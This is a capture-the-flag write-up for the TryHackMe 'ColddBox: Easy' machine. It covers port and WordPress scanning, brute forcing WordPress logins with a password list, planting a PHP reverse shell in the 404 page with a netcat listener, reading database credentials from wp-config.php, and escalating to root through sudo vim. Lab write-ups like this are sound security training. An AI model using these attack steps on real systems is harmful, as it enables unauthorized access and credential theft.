8 minutes
THM: ColddBox: Easy
Title:ColddBox: Easy
Description:An easy level machine with multiple ways to escalate privileges. By Hixec.
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.43.240 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 00:18 BST
Nmap scan report for 10.10.43.240
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: ColddBox | One more machine
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_ 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.98 seconds
Website
The website is running wordpress. This is shown on the site itself and was also identified in the nmap scan. Looking at the contents of the site did not show anything obvious so we will run a wpscan.
# wpscan --url http://10.10.43.240/ -e vp,vt,cb,dbe,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.43.240/ [10.10.43.240]
[+] Started: Mon Aug 11 00:26:32 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.43.240/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.43.240/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.43.240/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.43.240/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://10.10.43.240/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.43.240/wp-content/themes/twentyfifteen/
| Last Updated: 2025-04-15T00:00:00.000Z
| Readme: http://10.10.43.240/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 4.0
| Style URL: http://10.10.43.240/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.43.240/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <==================================================================================================================> (652 / 652) 100.00% Time: 00:00:03
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <=========================================================================================================================> (75 / 75) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] the cold in person
| Found By: Rss Generator (Passive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Aug 11 00:26:46 2025
[+] Requests Done: 940
[+] Cached Requests: 10
[+] Data Sent: 239.568 KB
[+] Data Received: 22.623 MB
[+] Memory used: 293.793 MB
[+] Elapsed time: 00:00:14
From the scan we have got some users. Now we will use the -passwords flag of wpscan to brute force the logins.
# wpscan --url http://10.10.43.240/ --passwords /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt
...
...
...
[i] User(s) Identified:
[+] the cold in person
| Found By: Rss Generator (Passive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Wp Login against 4 user/s
[SUCCESS] - c0ldd / **********
Trying hugo / blitz Time: 00:46:51 <========================================================================================== > (32915 / 42915) 76.69% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: c0ldd, Password: **********
With the valud credentials we can now login to wordpress. From the administrative panel we can edit the site so that we can get a reverse shell. In this case a php shell is added to the 404 page.
By visiting a nonexistent wordpress URL we can trigger the reverse shell.
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [110.10.43.240] 34160
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
00:20:25 up 1:17, 0 users, load average: 0.00, 0.00, 0.32
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Looking around on the box we find the wordpress files in /var/www/html. Looking inside the config file there is a password listed for a known username.
$ cd /var/www/html
$ ls -lah
total 192K
drwxr-xr-x 6 root root 4.0K Oct 14 2020 .
drwxr-xr-x 3 root root 4.0K Oct 14 2020 ..
drwxr-xr-x 2 root root 4.0K Oct 19 2020 hidden
-rw-r--r-- 1 www-data www-data 418 Sep 25 2013 index.php
-rw-r--r-- 1 www-data www-data 20K Sep 24 2020 license.txt
-rw-r--r-- 1 www-data www-data 7.1K Sep 24 2020 readme.html
-rw-r--r-- 1 www-data www-data 6.3K Sep 24 2020 wp-activate.php
drwxr-xr-x 9 www-data www-data 4.0K Dec 18 2014 wp-admin
-rw-r--r-- 1 www-data www-data 271 Jan 8 2012 wp-blog-header.php
-rw-r--r-- 1 www-data www-data 5.1K Sep 24 2020 wp-comments-post.php
-rw-r--r-- 1 www-data www-data 2.7K Sep 9 2014 wp-config-sample.php
-rw-rw-rw- 1 www-data www-data 3.0K Oct 14 2020 wp-config.php
drwxr-xr-x 6 www-data www-data 4.0K Oct 19 2020 wp-content
-rw-r--r-- 1 www-data www-data 2.9K May 13 2014 wp-cron.php
drwxr-xr-x 12 www-data www-data 4.0K Dec 18 2014 wp-includes
-rw-r--r-- 1 www-data www-data 2.4K Oct 25 2013 wp-links-opml.php
-rw-r--r-- 1 www-data www-data 2.7K Jul 7 2014 wp-load.php
-rw-r--r-- 1 www-data www-data 33K Sep 24 2020 wp-login.php
-rw-r--r-- 1 www-data www-data 8.3K Sep 24 2020 wp-mail.php
-rw-r--r-- 1 www-data www-data 11K Jul 18 2014 wp-settings.php
-rw-r--r-- 1 www-data www-data 25K Nov 30 2014 wp-signup.php
-rw-r--r-- 1 www-data www-data 4.0K Nov 30 2014 wp-trackback.php
-rw-r--r-- 1 www-data www-data 3.0K Feb 9 2014 xmlrpc.php
$ cat wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');
/** MySQL database username */
define('DB_USER', 'c0ldd');
/** MySQL database password */
define('DB_PASSWORD', '*************');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Using these discoverd creds we start a better shell with python and then su to the other account. This gets us the user flag
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
ww-data@ColddBox-Easy:/var/www/html$ su - c0ldd
su - c0ldd
Password: *************
c0ldd@ColddBox-Easy:~$ ls
ls
user.txt
c0ldd@ColddBox-Easy:~$ cat user.txt
cat user.txt
Rm********************************************==
Privilege esclation
We can SSH into the box using the discovered credentials which does make useability a bit easier. Checking our sudo permissions we can see 3 entries.
# ssh c0ldd@10.10.201.143 -p 4512
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Pueden actualizarse 129 paquetes.
92 actualizaciones son de seguridad.
Last login: Mon Nov 8 13:20:08 2021 from 10.0.2.15
c0ldd@ColddBox-Easy:~$ ls
user.txt
c0ldd@ColddBox-Easy:~$ sudo -l
[sudo] password for c0ldd:
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
c0ldd@ColddBox-Easy:~$
Using vim we can get a shell as root and grab the flag
c0ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'
# id
uid=0(root) gid=0(root) grupos=0(root)
# cd /root
# cat root.txt
wq***********************************=